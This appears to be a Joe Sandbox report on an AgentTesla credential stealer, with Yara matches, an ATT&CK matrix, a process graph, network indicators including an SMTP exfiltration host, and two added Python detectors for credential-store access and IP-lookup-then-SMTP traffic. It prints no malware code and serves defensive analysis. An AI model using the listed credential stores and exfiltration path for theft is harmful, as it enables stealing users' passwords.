Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b4d470.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 3892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 2760, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XNYbGrcoFr.exe PID: 5096, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XNYbGrcoFr.exe PID: 5308, type: MEMORYSTR
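The file and registry artifacts listed above (the WinSCP sessions key, Chrome and Edge Login Data, the profiles.ini of Firefox, Cyberfox, BlackHawk and Thunderbird, FTP Navigator's Ftplist.txt, the MAPI profile key and IncrediMail identities) are a usable host-side detection signal: one process reading the credential stores of several unrelated applications is what a stealer does and what those applications never do to each other. The following is an added example, not code from the report or from Joe Sandbox, that scores constructed access events modelled on the rows above. The owner process names for Cyberfox, BlackHawk, IncrediMail and FTP Navigator are assumptions; the others are the real binaries.

```python
"""Flag processes that read credential stores of several unrelated applications.

Added example. SAMPLE_EVENTS is constructed to mirror the artifact paths in
the report; it is not a log captured from the sandbox run.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple

# (pattern over the file path or registry key, store category, binaries that
# legitimately own that store). chrome.exe, msedge.exe, firefox.exe,
# thunderbird.exe, outlook.exe and winscp.exe are the real process names;
# cyberfox.exe, blackhawk.exe, incmail.exe and ftpnavigator.exe are assumed.
STORE_PATTERNS: List[Tuple[re.Pattern, str, Set[str]]] = [
    (re.compile(r"\\Martin Prikryl\\WinSCP 2\\Sessions$", re.I), "winscp", {"winscp.exe"}),
    (re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\Login Data$", re.I),
     "browser", {"chrome.exe", "msedge.exe"}),
    (re.compile(r"\\(Mozilla\\Firefox|8pecxstudios\\Cyberfox|NETGATE Technologies\\BlackHawk)\\profiles\.ini$", re.I),
     "browser", {"firefox.exe", "cyberfox.exe", "blackhawk.exe"}),
    (re.compile(r"\\Thunderbird\\profiles\.ini$", re.I), "mail", {"thunderbird.exe"}),
    (re.compile(r"\\Windows Messaging Subsystem\\Profiles$", re.I), "mail", {"outlook.exe"}),
    (re.compile(r"\\IncrediMail\\Identities$", re.I), "mail", {"incmail.exe"}),
    (re.compile(r"\\FTP Navigator\\Ftplist\.txt$", re.I), "ftp", {"ftpnavigator.exe"}),
]

MALWARE_SAMPLE = r"C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
MALWARE_DROPPED = r"C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"

# Constructed (process, target) events: the two report processes touching the
# stores above, plus the stores' own applications reading their own data.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (MALWARE_DROPPED, r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    (MALWARE_DROPPED, r"C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini"),
    (MALWARE_DROPPED, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (MALWARE_DROPPED, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (MALWARE_DROPPED, r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (MALWARE_DROPPED, r"C:\FTP Navigator\Ftplist.txt"),
    (MALWARE_DROPPED, r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (MALWARE_DROPPED, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    (MALWARE_DROPPED, r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    (MALWARE_SAMPLE, r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    (MALWARE_SAMPLE, r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (MALWARE_SAMPLE, r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    (r"C:\Program Files\Mozilla Firefox\firefox.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (r"C:\Program Files\WinSCP\WinSCP.exe", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]


def classify(target: str) -> Optional[Tuple[str, Set[str]]]:
    """Return (category, owners) for a known credential-store path or key, else None."""
    for pattern, category, owners in STORE_PATTERNS:
        if pattern.search(target):
            return category, owners
    return None


def foreign_store_access(events: Iterable[Tuple[str, str]]) -> Dict[str, Set[str]]:
    """Map each process to the store categories it read without being their owner."""
    touched: Dict[str, Set[str]] = defaultdict(set)
    for process, target in events:
        hit = classify(target)
        if hit is None:
            continue
        category, owners = hit
        if process.rsplit("\\", 1)[-1].lower() in owners:
            continue  # an application reading its own store is expected
        touched[process].add(category)
    return dict(touched)


def flag_stealers(events: Iterable[Tuple[str, str]], min_categories: int = 2) -> List[str]:
    """Processes that read stores of at least `min_categories` different kinds.

    One foreign store has benign explanations (backup agents, profile migration
    tools); WinSCP plus browser plus mail plus FTP in a single process does not.
    """
    return sorted(process for process, categories in foreign_store_access(events).items()
                  if len(categories) >= min_categories)


if __name__ == "__main__":
    for process, categories in foreign_store_access(SAMPLE_EVENTS).items():
        print(f"{process}: {sorted(categories)}")
    print("flagged:", flag_stealers(SAMPLE_EVENTS))
```

In a real pipeline the events come from Sysmon file and registry events or an EDR telemetry stream; the owner check is what keeps the rule quiet on hosts where the browsers and mail clients are actually in use, and the category threshold is what separates the dropped XNYbGrcoFr.exe (four store kinds) from a single-purpose utility.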

                    Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b4d470.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 3892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 2760, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XNYbGrcoFr.exe PID: 5096, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XNYbGrcoFr.exe PID: 5308, type: MEMORYSTR
ATT&CK Matrix (techniques per tactic, in the order of the report's rows; a number in front of a technique is the marker the report attaches to it)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 231 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 261 Virtualization/Sandbox Evasion; 111 Process Injection
Credential Access: 2 OS Credential Dumping; 1 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 File and Directory Discovery; 34 System Information Discovery; 1 Query Registry; 631 Security Software Discovery; 1 Process Discovery; 261 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 1447920 | Sample: GestorRemesasCONFIRMIMING.exe | Start date: 27/05/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: us2.smtp.mailhostbox.com; smtp.santonswitchgears.com; 2 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
  Started: GestorRemesasCONFIRMIMING.exe 7 (node 8); XNYbGrcoFr.exe 5 (node 12)

GestorRemesasCONFIRMIMING.exe 7 (node 8)
  Dropped: C:\Users\user\AppData\...\XNYbGrcoFr.exe, PE32; C:\Users\user\AppData\Local\...\tmpCF9B.tmp, XML
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 4 other signatures
  Started: GestorRemesasCONFIRMIMING.exe 15 2 (node 14); powershell.exe 23 (node 18); powershell.exe 23 (node 20); schtasks.exe 1 (node 22)

XNYbGrcoFr.exe 5 (node 12)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  Started: XNYbGrcoFr.exe (node 24); schtasks.exe (node 26)

GestorRemesasCONFIRMIMING.exe (node 14)
  DNS/IP: ip-api.com 208.95.112.1, 49703, 49708, 80 TUT-ASUS United States; us2.smtp.mailhostbox.com 208.91.198.143, 49705, 49709, 587 PUBLIC-DOMAIN-REGISTRYUS United States; api.ipify.org 172.67.74.152, 443, 49702, 49707 CLOUDFLARENETUS United States

powershell.exe (node 18)
  Signatures: Loading BitLocker PowerShell Module
  Started: WmiPrvSE.exe (node 28); conhost.exe (node 30)

powershell.exe (node 20)
  Started: conhost.exe (node 32)

schtasks.exe (node 22)
  Started: conhost.exe (node 34)

XNYbGrcoFr.exe (node 24)
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

schtasks.exe (node 26)
  Started: conhost.exe (node 36)
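The graph shows the injected GestorRemesasCONFIRMIMING.exe process contacting api.ipify.org (public IP lookup), ip-api.com (the hosting/data-centre check) and then us2.smtp.mailhostbox.com on port 587, which is the AgentTesla SMTP exfiltration path. The ordering, an IP-lookup service followed within seconds by an SMTP session to a mail host the organisation does not use, is a network-side detection that needs only proxy or flow logs. The following is an added example, not part of the report, that runs the correlation over a constructed connection log; the relay name mail.corp.example and the five-minute window are assumptions.

```python
"""Correlate public-IP lookups with a following external SMTP session per host.

Added example. SAMPLE_LOG is constructed (it is not the report's pcap), one
connection per line: timestamp, source host, destination name, destination ip,
destination port.
"""
import csv
from datetime import datetime
from io import StringIO
from typing import Dict, List, Tuple

IP_LOOKUP_HOSTS = {"api.ipify.org", "ip-api.com"}   # both contacted by the sample
SMTP_PORTS = {25, 465, 587}
CORPORATE_RELAYS = {"mail.corp.example"}            # assumed: the organisation's own mail servers

SAMPLE_LOG = """\
2024-05-27T10:00:01Z,10.0.0.5,api.ipify.org,172.67.74.152,443
2024-05-27T10:00:02Z,10.0.0.5,ip-api.com,208.95.112.1,80
2024-05-27T10:00:04Z,10.0.0.5,us2.smtp.mailhostbox.com,208.91.198.143,587
2024-05-27T10:01:00Z,10.0.0.7,mail.corp.example,10.0.1.25,587
2024-05-27T10:02:00Z,10.0.0.9,api.ipify.org,172.67.74.152,443
2024-05-27T10:45:00Z,10.0.0.9,us2.smtp.mailhostbox.com,208.91.198.143,587
2024-05-27T11:00:00Z,10.0.0.5,api.ipify.org,172.67.74.152,443
2024-05-27T11:00:03Z,10.0.0.5,us2.smtp.mailhostbox.com,208.91.198.143,587
"""

Record = Tuple[datetime, str, str, str, int]


def parse_log(text: str) -> List[Record]:
    """Parse the CSV log into (time, src, dst_name, dst_ip, port), oldest first."""
    rows: List[Record] = []
    for ts, src, dst_name, dst_ip, port in csv.reader(StringIO(text)):
        rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst_name, dst_ip, int(port)))
    return sorted(rows)


def find_exfil_sequences(text: str, window_seconds: int = 300) -> List[Tuple[datetime, str, str]]:
    """Return (time, src, smtp_destination) for every SMTP connection to a
    non-corporate relay that the same host preceded, within `window_seconds`,
    by a request to one of the public-IP lookup services."""
    last_lookup: Dict[str, datetime] = {}
    hits: List[Tuple[datetime, str, str]] = []
    for ts, src, dst_name, _dst_ip, port in parse_log(text):
        if dst_name in IP_LOOKUP_HOSTS:
            last_lookup[src] = ts          # remember the most recent lookup per host
        elif port in SMTP_PORTS and dst_name not in CORPORATE_RELAYS:
            seen = last_lookup.get(src)
            if seen is not None and (ts - seen).total_seconds() <= window_seconds:
                hits.append((ts, src, dst_name))
    return hits


if __name__ == "__main__":
    for ts, src, dst in find_exfil_sequences(SAMPLE_LOG):
        print(f"{ts.isoformat()} {src} -> {dst}: IP lookup followed by external SMTP")
```

Host 10.0.0.7 talks SMTP only to the corporate relay and is never reported; host 10.0.0.9 did a lookup 43 minutes before its external SMTP session and is reported only when the window is widened, which is the knob to tune against how quickly the stealer in this report moved (three seconds between the lookups and port 587).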

Source | Detection | Scanner | Label
GestorRemesasCONFIRMIMING.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
GestorRemesasCONFIRMIMING.exe | 58% | Virustotal |
GestorRemesasCONFIRMIMING.exe | 100% | Avira | TR/AD.GenSteal.wukbo
GestorRemesasCONFIRMIMING.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | 100% | Avira | TR/AD.GenSteal.wukbo
C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
https://api.ipify.org/ | 0% | URL Reputation | safe
https://api.ipify.org | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
https://api.ipify.org/t | 0% | URL Reputation | safe
http://us2.smtp.mailhostbox.com | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
http://ip-api.com | 0% | URL Reputation | safe
http://tempuri.org/DataSet1.xsdIDataAccessLayer.Properties.Resources | 0% | Avira URL Cloud | safe
http://smtp.santonswitchgears.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.198.143 | true | true | | unknown
api.ipify.org | 172.67.74.152 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
smtp.santonswitchgears.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://smtp.santonswitchgears.com | GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org/t | GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://us2.smtp.mailhostbox.com | GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2123183348.000000000260A000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2166350943.000000000285A000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/DataSet1.xsdIDataAccessLayer.Properties.Resources | GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://ip-api.com | GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.91.198.143 | us2.smtp.mailhostbox.com | United States | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | true
172.67.74.152 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1447920
Start date and time: 2024-05-27 12:29:57 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: GestorRemesasCONFIRMIMING.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@19/15@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 196
• Number of non-executed functions: 9
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:30:43 | API Interceptor | 7838442x Sleep call for process: GestorRemesasCONFIRMIMING.exe modified
06:30:45 | API Interceptor | 32x Sleep call for process: powershell.exe modified
06:30:48 | API Interceptor | 5683084x Sleep call for process: XNYbGrcoFr.exe modified
12:30:47 | Task Scheduler | Run new task: XNYbGrcoFr path: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
208.91.198.143 | Proforma Invoice.exe | Get hash | malicious | AgentTesla | Browse |
208.91.198.143 | rPAGO_8732.exe | Get hash | malicious | AgentTesla | Browse |
208.91.198.143 | Invoice KIK-1 P234478.exe | Get hash | malicious | AgentTesla | Browse |
208.91.198.143 | Quote.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
208.91.198.143 | SecuriteInfo.com.TrojanX-gen.21872.19160.exe | Get hash | malicious | AgentTesla | Browse |
208.91.198.143 | ceb61a3c32747d2a429f03e2f203c8fa617b18b8d544a514ecbff042243e80f6_payload.exe | Get hash | malicious | AgentTesla | Browse |
208.91.198.143 | THA-02187.pdf.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
208.91.198.143 | mC7Uei8s0EHz22P.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
208.91.198.143 | order KHLN2024011801.exe | Get hash | malicious | AgentTesla | Browse |
208.91.198.143 | MT 103.exe | Get hash | malicious | AgentTesla | Browse |
208.95.112.1 | documentos.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | PI-236031.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | INV 0983 OSY 240524_PDF.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | 99200032052824.bat.exe | Get hash | malicious | GuLoader | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | PO_27052024.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Reiven RFQ-27-05-2024.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | ev1NIvTd6f.exe | Get hash | malicious | Unknown | Browse | /json/
208.95.112.1 | https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDE | Get hash | malicious | DCRat | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | uChcvn3L6R.exe | Get hash | malicious | DCRat | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | uChcvn3L6R.exe | Get hash | malicious | DCRat | Browse | ip-api.com/line/?fields=hosting
172.67.74.152 | K8mzlntJVN.msi | Get hash | malicious | Unknown | Browse | api.ipify.org/
172.67.74.152 | stub.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/
172.67.74.152 | stub.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/
172.67.74.152 | Sonic-Glyder.exe | Get hash | malicious | Stealit | Browse | api.ipify.org/?format=json
172.67.74.152 | Sky-Beta.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/?format=json
172.67.74.152 | Sky-Beta.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/?format=json
172.67.74.152 | Sky-Beta-Setup.exe | Get hash | malicious | Stealit | Browse | api.ipify.org/?format=json
172.67.74.152 | Sky-Beta.exe | Get hash | malicious | Stealit | Browse | api.ipify.org/?format=json
172.67.74.152 | SongOfVikings.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/?format=json
172.67.74.152 | SongOfVikings.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/?format=json
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
us2.smtp.mailhostbox.com | Purchase Order.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.223
us2.smtp.mailhostbox.com | ASCD0001 INQ9829......pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.225
us2.smtp.mailhostbox.com | Best Price.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.225
us2.smtp.mailhostbox.com | Proforma Invoice.exe | Get hash | malicious | AgentTesla | Browse | 208.91.198.143
us2.smtp.mailhostbox.com | DHL BL Draft copy.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.224
us2.smtp.mailhostbox.com | Draft BL copy.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.223
